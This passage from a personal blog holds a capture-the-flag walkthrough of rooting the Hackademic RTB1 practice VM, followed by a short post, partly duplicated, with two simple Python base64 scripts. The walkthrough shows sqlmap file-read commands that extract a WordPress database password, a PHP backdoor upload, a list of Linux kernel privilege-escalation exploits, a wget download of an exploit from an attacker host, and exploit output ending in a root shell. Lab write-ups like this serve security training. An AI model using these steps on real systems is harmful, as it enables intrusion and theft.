| a6e514f9486b83cb53d8d932f9a04292 | TonyBlack | 0 | Black | Tony |
| b986448f0bb9e5e124ca91d3d650f52c | JohnSmith | 0 | Smith | John |
+----------------------------------+--------------+------------+---------------+----------------+
We can go ahead and crack them also:
Interesting to note that user_level might be authorization level. So 10 could be the highest.
So now we have user accounts and their passwords, but we still do not have the root DBA password.
I know that the password is configured in some file somewhere on the system.
So Google is my friend.
Searched for "wordpress configuration file" and came up with the config filename wp-config.php
But i do not know the location, yet.
The httpd.conf could be helpful
After some trial and error and browsing the web for default location i tried.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/etc/httpd/conf/httpd.conf"
The file contained.
DocumentRoot "/var/www/html"
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/var/www/html/Hackademic_RTB1/wp-config.php"
// ** MySQL settings ** //\r
define('DB_NAME', 'wordpress'); // The name of the database\r
define('DB_USER', 'root'); // Your MySQL username\r
define('DB_PASSWORD', 'lz5yedns'); // ...and password\r
So how do I login?
Googled some more and found that the admin login interface is /wp-admin
We cracked the passwords earlier so lets login with the useraccount with the highest user_level (GeorgeMiller)
after some looking around in wordpress admin gui.
Found that uploading was disabled. As an administrator i enabled uploading of php files.
Modified a php backdoor
Activate a shell listener. and clicked on the uploaded special.php.
We have a shell!! running as the apache user.
Now we could upload metasploit meterpreters for pivoting, but since the goal is to root the box we focus on that.
We can also start password guessing, using sucrack to crack the root password.
Lets see if the system is vulnerable first.
sh-4.0$ uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
My best guess is finding a matching local privilege escalation exploit in exploitdb.
Found a few good candidate exploits..
So i started to compile and test them out.
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
12130,platforms/linux/local/12130.py,"Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0
15285,platforms/linux/local/15285.c,"Linux RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
Compile and upload the exploit
sh-4.0$ wget http://192.168.140.134/rtb1-rds
wget http://192.168.140.134/rtb1-rds
--2012-09-06 04:47:35-- http://192.168.140.134/rtb1-rds
Connecting to 192.168.140.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12503 (12K) [text/plain]
Saving to: `rtb1-rds'
0K .......... .. 100% 2.12M=0.006s
2012-09-06 04:47:35 (2.12 MB/s) - `rtb1-rds' saved [12503/12503]
sh-4.0$ ls -lsa
ls -lsa
total 60
4 drwxrwxrwt 6 root root 4096 Sep 6 04:47 .
4 dr-xr-xr-x 22 root root 4096 Sep 6 04:05 ..
4 drwxrwxrwt 2 root root 4096 Sep 6 04:05 .ICE-unix
4 -r--r--r-- 1 root root 11 Sep 6 04:05 .X0-lock
4 drwxrwxrwt 2 root root 4096 Sep 6 04:05 .X11-unix
4 drwx------ 2 gdm gdm 4096 Sep 6 04:05 orbit-gdm
4 drwx------ 2 gdm gdm 4096 Sep 6 04:05 pulse-PKdhtXMmr18n
16 -rwxrwxrwx 1 apache apache 12474 Sep 6 2012 rtb1
16 -rw-rw-rw- 1 apache apache 12503 Sep 6 2012 rtb1-rds
sh-4.0$ chmod +x rtb1-rds
EXPLOIT
sh-4.0$ ./rtb1-rds
./rtb1-rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
id
uid=0(root) gid=0(root)
YES! We got ROOT!
cd /root
ls
Desktop
anaconda-ks.cfg
key.txt
key.txt~
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)
Regards,
mr.pr0n || p0wnbox.Team || 2011
MISSION ACCOMPLISHED!!!
Sunday, September 2, 2012
Python simple base64 encode/decode script
I found the need of encoding and decoding base64 values fast from stdin to stdout (without GUI-crap) and started to look around for tools and i could find a bunch of them, but most of them were with advanced options and parameters.
Sometimes simple is enough so i wrote two scripts and included them in my PATH statement.
----------------------------------
# Base64 Encode stdin to stdout
#! /usr/bin/python
# Filename: b64enc.py
import base64
import sys
base64encoded = base64.b64encode(sys.stdin.read())
print base64encoded
----------------------------------
# Base64 Decode stdin to stdout
#! /usr/bin/python
# Filename b64dec.py
import base64
import sys
base64decoded = base64.b64decode(sys.stdin.read())
print base64decoded
Example:
Enjoy!
Sometimes simple is enough so i wrote two scripts and included them in my PATH statement.
----------------------------------
# Base64 Encode stdin to stdout
#! /usr/bin/python
# Filename: b64enc.py
import base64
import sys
base64encoded = base64.b64encode(sys.stdin.read())
print base64encoded
----------------------------------
# Base64 Decode stdin to stdout
#! /usr/bin/python
# Filename b64dec.py
import base64
import sys
base64decoded = base64.b64decode(sys.stdin.read())
print base64decoded
Example:
Enjoy!
Subscribe to:
Posts (Atom)